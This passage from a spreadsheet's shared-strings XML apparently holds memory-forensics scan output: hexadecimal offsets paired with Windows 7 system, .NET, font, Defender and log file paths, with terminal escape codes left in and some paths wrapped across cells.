    <t>\Windows\System32\wbem\Performance\WmiApRpl.ini.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef721d0</t>
  </si>
  <si>
    <t>0xdef72308</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\SearchIndexer.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef72e88</t>
  </si>
  <si>
    <t>0xdef73820</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1989.tmp\System.EnterpriseServices.Wrappe</t>
  </si>
  <si>
    <t>0xdef73d18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef73ef0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Security\5f06757d1690675866a2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef741e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\da0342ef79c91b6bc2df_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef74348</t>
  </si>
  <si>
    <t>0xdef749e0</t>
  </si>
  <si>
    <t>0xdef74cb0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ac97intc.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef75328</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef756c0</t>
  </si>
  <si>
    <t>0xdef758c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a</t>
  </si>
  <si>
    <t>442b34fc.mani</t>
  </si>
  <si>
    <t>fest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef759b0</t>
  </si>
  <si>
    <t>0xdef76b88</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef77480</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\2.0.0.0__b03f5f7f11d50</t>
  </si>
  <si>
    <t>a3a\System.Ru</t>
  </si>
  <si>
    <t>ntime.Seria</t>
  </si>
  <si>
    <t>lizati</t>
  </si>
  <si>
    <t>on.Formatters.Soap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef777b8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mcstoredb\6.1.0.0__31bf3856ad364e35\mcstoredb.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef778c0</t>
  </si>
  <si>
    <t>0xdef77978</t>
  </si>
  <si>
    <t>0xdef77b70</t>
  </si>
  <si>
    <t>0xdef77d98</t>
  </si>
  <si>
    <t>0xdef77f80</t>
  </si>
  <si>
    <t>0xdef781e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration</t>
  </si>
  <si>
    <t>0xdef784e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiProxy\6.1.0.0__31bf3856ad364e35\ehiProxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef78750</t>
  </si>
  <si>
    <t>0xdef78808</t>
  </si>
  <si>
    <t>0xdef78bc8</t>
  </si>
  <si>
    <t>0xdef78e00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\728f2c8f9db2cc97a4f_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef79268</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.DirectoryServices.Protocols\2.0.0.0__b03f5f7f11d50a3a\System</t>
  </si>
  <si>
    <t>.DirectorySer</t>
  </si>
  <si>
    <t>vices.Proto</t>
  </si>
  <si>
    <t>cols.d</t>
  </si>
  <si>
    <t>0xdef795e0</t>
  </si>
  <si>
    <t>0xdef79d18</t>
  </si>
  <si>
    <t>0xdef7a038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\WindowsBase\3.0.0.0__31bf3856ad364e35\WindowsBase.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7a200</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1989.tmp\System.EnterpriseServices.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef7a2b8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Runtime.Remoting\2.0.0.0__b77a5c561934e089\System.Runtime.Re</t>
  </si>
  <si>
    <t>moting.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef7a498</t>
  </si>
  <si>
    <t>0xdef7a828</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\609d575810454246d640_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7a8e0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.Enterprise</t>
  </si>
  <si>
    <t>0xdef7b0e8</t>
  </si>
  <si>
    <t>0xdef7b1a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Deployment\2.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef7b330</t>
  </si>
  <si>
    <t>0xdef7b5b0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\BDATunePIA\6.1.0.0__31bf3856ad364e35\BDATunePIA.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7b7e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Accessibility\2.0.0.0__b03f5f7f11d50a3a\Accessibility.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7cce0</t>
  </si>
  <si>
    <t>0xdef7cd98</t>
  </si>
  <si>
    <t>0xdef7daf8</t>
  </si>
  <si>
    <t>0xdef7de10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\UIAutomationTypes\1320b9b2d4f1509e69ca_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7dec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Confi</t>
  </si>
  <si>
    <t>guration.Inst</t>
  </si>
  <si>
    <t>all.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7df80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcstore\7e9b699b007b2a780ec9_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7e110</t>
  </si>
  <si>
    <t>\Windows\System32\mssrch.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7e378</t>
  </si>
  <si>
    <t>0xdef7e5b8</t>
  </si>
  <si>
    <t>0xdef7e670</t>
  </si>
  <si>
    <t>\Windows\ehome\en-US\ehres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7e790</t>
  </si>
  <si>
    <t>0xdef7eb18</t>
  </si>
  <si>
    <t>0xdef7f140</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ESENT.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7f498</t>
  </si>
  <si>
    <t>0xdef7f9d0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\MSStmp.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7fba8</t>
  </si>
  <si>
    <t>0xdef7fd90</t>
  </si>
  <si>
    <t>NDEX.002_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef7fe48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcupdate\db414396757d6fe83088_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef80c90</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5509.tmp\System.Data.OracleClient.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef81720</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\q</t>
  </si>
  <si>
    <t>laheb[1].htm_x001B_</t>
  </si>
  <si>
    <t>0xdef81ac8</t>
  </si>
  <si>
    <t>0xdef82480</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6D8E.tmp\Microsoft.Transactions.Bridge.dl</t>
  </si>
  <si>
    <t>0xdef84448</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF219.tmp\PresentationFramework.Aero.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef84b38</t>
  </si>
  <si>
    <t>0xdef84dc8</t>
  </si>
  <si>
    <t>0xdef85248</t>
  </si>
  <si>
    <t>70}\mpasdlta.</t>
  </si>
  <si>
    <t>0xdef855d8</t>
  </si>
  <si>
    <t>0xdef858b8</t>
  </si>
  <si>
    <t>0xdef85c18</t>
  </si>
  <si>
    <t>0xdef85ef0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\MpSfc.bin_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef86220</t>
  </si>
  <si>
    <t>0xdef86300</t>
  </si>
  <si>
    <t>\Windows\System32\actxprxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef863e8</t>
  </si>
  <si>
    <t>\Windows\System32\fdPHost.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef86520</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explo</t>
  </si>
  <si>
    <t>rer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef86eb8</t>
  </si>
  <si>
    <t>0xdef875d8</t>
  </si>
  <si>
    <t>0xdef884b0</t>
  </si>
  <si>
    <t>0xdef88790</t>
  </si>
  <si>
    <t>0xdef88a88</t>
  </si>
  <si>
    <t>0xdef8a4e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_fonts_fee710f4f7b180e0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef8a798</t>
  </si>
  <si>
    <t>\Windows\System32\SearchProtocolHost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef8ba30</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx_x001B_[0K_x001B_</t>
  </si>
  <si>
    <t>[57G</t>
  </si>
  <si>
    <t>0xdef8bbc0</t>
  </si>
  <si>
    <t>0xdef8bc78</t>
  </si>
  <si>
    <t>0xdef8bd98</t>
  </si>
  <si>
    <t>0xdef8bf80</t>
  </si>
  <si>
    <t>0xdef8c270</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP10BA.tmp\System.Workflow.Runtime.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef8c6d0</t>
  </si>
  <si>
    <t>0xdef8d660</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Deployment\f39d3edc44a3dc28856b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef8de38</t>
  </si>
  <si>
    <t>0xdef8df80</t>
  </si>
  <si>
    <t>0xdef8e420</t>
  </si>
  <si>
    <t>0xdef8e568</t>
  </si>
  <si>
    <t>0xdef90b40</t>
  </si>
  <si>
    <t>0xdef910a0</t>
  </si>
  <si>
    <t>0xdef91568</t>
  </si>
  <si>
    <t>0xdef91708</t>
  </si>
  <si>
    <t>0xdef91f80</t>
  </si>
  <si>
    <t>0xdef92640</t>
  </si>
  <si>
    <t>0xdef92d18</t>
  </si>
  <si>
    <t>0xdef93510</t>
  </si>
  <si>
    <t>0xdef94200</t>
  </si>
  <si>
    <t>0xdef94568</t>
  </si>
  <si>
    <t>0xdef94f80</t>
  </si>
  <si>
    <t>0xdef95210</t>
  </si>
  <si>
    <t>0xdef95340</t>
  </si>
  <si>
    <t>\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef95860</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP4763.tmp\Microsoft.PowerShell.Commands.Di</t>
  </si>
  <si>
    <t>agnostics.dll</t>
  </si>
  <si>
    <t>0xdef95a18</t>
  </si>
  <si>
    <t>Services.Wrap</t>
  </si>
  <si>
    <t>per.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef95e88</t>
  </si>
  <si>
    <t>0xdef962e0</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77</t>
  </si>
  <si>
    <t>EC63BDA74BD0D</t>
  </si>
  <si>
    <t>0E0426DC8F8</t>
  </si>
  <si>
    <t>0xdef96398</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\739</t>
  </si>
  <si>
    <t>6C420A8E1BC1D</t>
  </si>
  <si>
    <t>A97F1AF0D10</t>
  </si>
  <si>
    <t>BAD21_x001B_</t>
  </si>
  <si>
    <t>0xdef968c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\duser.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef96a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usbport.inf_x86_neutral_da3887e45b1c3bf8\usbport.</t>
  </si>
  <si>
    <t>0xdef96f80</t>
  </si>
  <si>
    <t>\Windows\System32\cabinet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef97dc8</t>
  </si>
  <si>
    <t>0xdef982a8</t>
  </si>
  <si>
    <t>0xdef98720</t>
  </si>
  <si>
    <t>0xdef98840</t>
  </si>
  <si>
    <t>0xdef98a18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wiaacmgr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef996f8</t>
  </si>
  <si>
    <t>0xdef997f8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{C931FD81-E854-4672-8CC</t>
  </si>
  <si>
    <t>F-181BF457017</t>
  </si>
  <si>
    <t>8}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef99f80</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\Segment0.cmf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9a2c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_savanna_6b39e54d8ae1e5ca.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9ad70</t>
  </si>
  <si>
    <t>0xdef9ae70</t>
  </si>
  <si>
    <t>0xdef9ba28</t>
  </si>
  <si>
    <t>0xdef9bbc8</t>
  </si>
  <si>
    <t>0xdef9c518</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_pla_reports_en-us_04eb81229a78dfb4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9cbe8</t>
  </si>
  <si>
    <t>0xdef9ce78</t>
  </si>
  <si>
    <t>\Windows\System32\schedcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9d730</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Foundation-</t>
  </si>
  <si>
    <t>Package~31bf3</t>
  </si>
  <si>
    <t>856ad364e35</t>
  </si>
  <si>
    <t>~x86~~</t>
  </si>
  <si>
    <t>6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9ddd8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\quartz.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9df80</t>
  </si>
  <si>
    <t>0xdef9e980</t>
  </si>
  <si>
    <t>Dataflow.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef9eca8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmhandy.inf_x86_neutral_e43d5c3fa1774569\mdmhand</t>
  </si>
  <si>
    <t>0xdef9f3b0</t>
  </si>
  <si>
    <t>0xdef9f550</t>
  </si>
  <si>
    <t>0xdef9f710</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefa0038</t>
  </si>
  <si>
    <t>0xdefa0940</t>
  </si>
  <si>
    <t>0xdefaab38</t>
  </si>
  <si>
    <t>0xdefaaf80</t>
  </si>
  <si>
    <t>0xdefab618</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\themecpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefab898</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fdPHost.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefaba38</t>
  </si>
  <si>
    <t>0xdefabbd0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dhcpcsvc6.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefabe50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sdrsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefac038</t>
  </si>
  <si>
    <t>0xdefac118</t>
  </si>
  <si>
    <t>0xdefac388</t>
  </si>
  <si>
    <t>0xdefac5b8</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiPrvSE.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefac670</t>
  </si>
  <si>
    <t>0xdefacaf8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wshom.ocx.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefacd10</t>
  </si>
  <si>
    <t>0xdeface18</t>
  </si>
  <si>
    <t>0xdefacf80</t>
  </si>
  <si>
    <t>0xdefad640</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\winspool.drv.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefad988</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mycomput.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefadc70</t>
  </si>
  <si>
    <t>\Windows\System32\security.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefae160</t>
  </si>
  <si>
    <t>\Windows\System32\slwga.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefaf6c8</t>
  </si>
  <si>
    <t>Troubleshoote</t>
  </si>
  <si>
    <t>r.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb0158</t>
  </si>
  <si>
    <t>0xdefb0210</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{FC856B98-F1C3-4F42-939</t>
  </si>
  <si>
    <t>7-225C551E3C0</t>
  </si>
  <si>
    <t>0xdefb0be8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_zh-tw_d74f4ee430136b4c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb1bf8</t>
  </si>
  <si>
    <t>0xdefb1db0</t>
  </si>
  <si>
    <t>0xdefb2410</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_aero_en-us_ab16867f204414fa.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb2a18</t>
  </si>
  <si>
    <t>0xdefb2b48</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_afternoon_ae5d080a6a887942.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb2cc8</t>
  </si>
  <si>
    <t>0xdefb3688</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\profsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb3838</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmusrk1.inf_x86_neutral_e1e41e3eef953389\mdmusrk</t>
  </si>
  <si>
    <t>0xdefb3b10</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\DataStore\Logs\edb.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb3c80</t>
  </si>
  <si>
    <t>0xdefb3f80</t>
  </si>
  <si>
    <t>0xdefb4a38</t>
  </si>
  <si>
    <t>0xdefb4b10</t>
  </si>
  <si>
    <t>0xdefb5038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_aero_en-us_1a668ac520a43d24.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb5578</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_l2schemas_d7bb5637381de58c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb59e0</t>
  </si>
  <si>
    <t>0xdefb5c10</t>
  </si>
  <si>
    <t>0xdefb5ec8</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\DataStore\DataStore.edb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb5f80</t>
  </si>
  <si>
    <t>smipi.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdefb6a50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mprdim.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb6cb8</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\DataStore\Logs\edb.chk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb6d70</t>
  </si>
  <si>
    <t>0xdefb7cf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hdwwiz.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb9328</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\ReportingEvents.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefb9d00</t>
  </si>
  <si>
    <t>\Windows\System32\msra.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefba5d0</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpEvMsg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefba9a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dot3gpui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbab88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msconfig.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbacd8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netbvbdx.inf_x86_neutral_6d29499ebc7c7338\netbvbd</t>
  </si>
  <si>
    <t>0xdefbad90</t>
  </si>
  <si>
    <t>0xdefbaed8</t>
  </si>
  <si>
    <t>0xdefbaf80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTMsMpPsSession7.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbc110</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbc3b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_config_9a0d48f3c07d2a12.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xdefbc618</t>
  </si>
  <si>
    <t>0xdefbc738</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_apppatch_en-us_098dc872781aebb9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbd180</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WindowsBase.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbd698</t>
  </si>
  <si>
    <t>0xdefbdc88</t>
  </si>
  <si>
    <t>\Windows\System32\mapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbdf40</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefbf038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_401039ffa1d92906.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc02b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Input.Manipulations\v4.0_4.0.0.0__b77a</t>
  </si>
  <si>
    <t>5c561934e089\</t>
  </si>
  <si>
    <t>System.Wind</t>
  </si>
  <si>
    <t>ows.In</t>
  </si>
  <si>
    <t>put.Manipulations.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc03d8</t>
  </si>
  <si>
    <t>0xdefc05a0</t>
  </si>
  <si>
    <t>0xdefc11b8</t>
  </si>
  <si>
    <t>\Windows\servicing\CbsApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc12b0</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\en-US\MsMpRes.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc1488</t>
  </si>
  <si>
    <t>0xdefc17d0</t>
  </si>
  <si>
    <t>K_x001B_[67G</t>
  </si>
  <si>
    <t>0xdefc21f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\SyncCenter.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc2f80</t>
  </si>
  <si>
    <t>0xdefc3198</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\printui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc4038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wuaueng.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc4ae8</t>
  </si>
  <si>
    <t>\$LogFile_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc5b60</t>
  </si>
  <si>
    <t>0xdefc6348</t>
  </si>
  <si>
    <t>\Windows\System32\restore\MachineGuid.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc66a8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iscsidsc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc6760</t>
  </si>
  <si>
    <t>0xdefc6818</t>
  </si>
  <si>
    <t>0xdefc6c58</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsupdate_en-us_6dbfbf04647c43f3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc75a0</t>
  </si>
  <si>
    <t>0xdefc7900</t>
  </si>
  <si>
    <t>0xdefc79c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imejp10_dicts_281006c600450618.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc7cd0</t>
  </si>
  <si>
    <t>0xdefc7d90</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imesc5_dicts_32255cd579e8854e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc8f80</t>
  </si>
  <si>
    <t>\Windows\System32\winsta.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc9588</t>
  </si>
  <si>
    <t>\Windows\System32\imm32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefc97d0</t>
  </si>
  <si>
    <t>\Windows\System32\winlogon.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefca038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wininit.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcc038</t>
  </si>
  <si>
    <t>\Windows\Fonts\arial.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcc3a0</t>
  </si>
  <si>
    <t>\Windows\Fonts\arialbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefce360</t>
  </si>
  <si>
    <t>\Windows\Fonts\marlett.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcecd8</t>
  </si>
  <si>
    <t>\Windows\System32\KBDUS.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcf338</t>
  </si>
  <si>
    <t>\Windows\Fonts\estre.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcf580</t>
  </si>
  <si>
    <t>\Windows\Fonts\ariali.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcf9b8</t>
  </si>
  <si>
    <t>\Windows\Fonts\courbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcfe30</t>
  </si>
  <si>
    <t>\Windows\Fonts\kokilab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefcff80</t>
  </si>
  <si>
    <t>\Windows\Fonts\daunpenh.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd0528</t>
  </si>
  <si>
    <t>\Windows\Fonts\couri.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd0b10</t>
  </si>
  <si>
    <t>\Windows\Fonts\Vani.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd0ce8</t>
  </si>
  <si>
    <t>\Windows\Fonts\cour.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd0e10</t>
  </si>
  <si>
    <t>\Windows\Fonts\kokilai.ttf_x001B_[0K</t>
  </si>
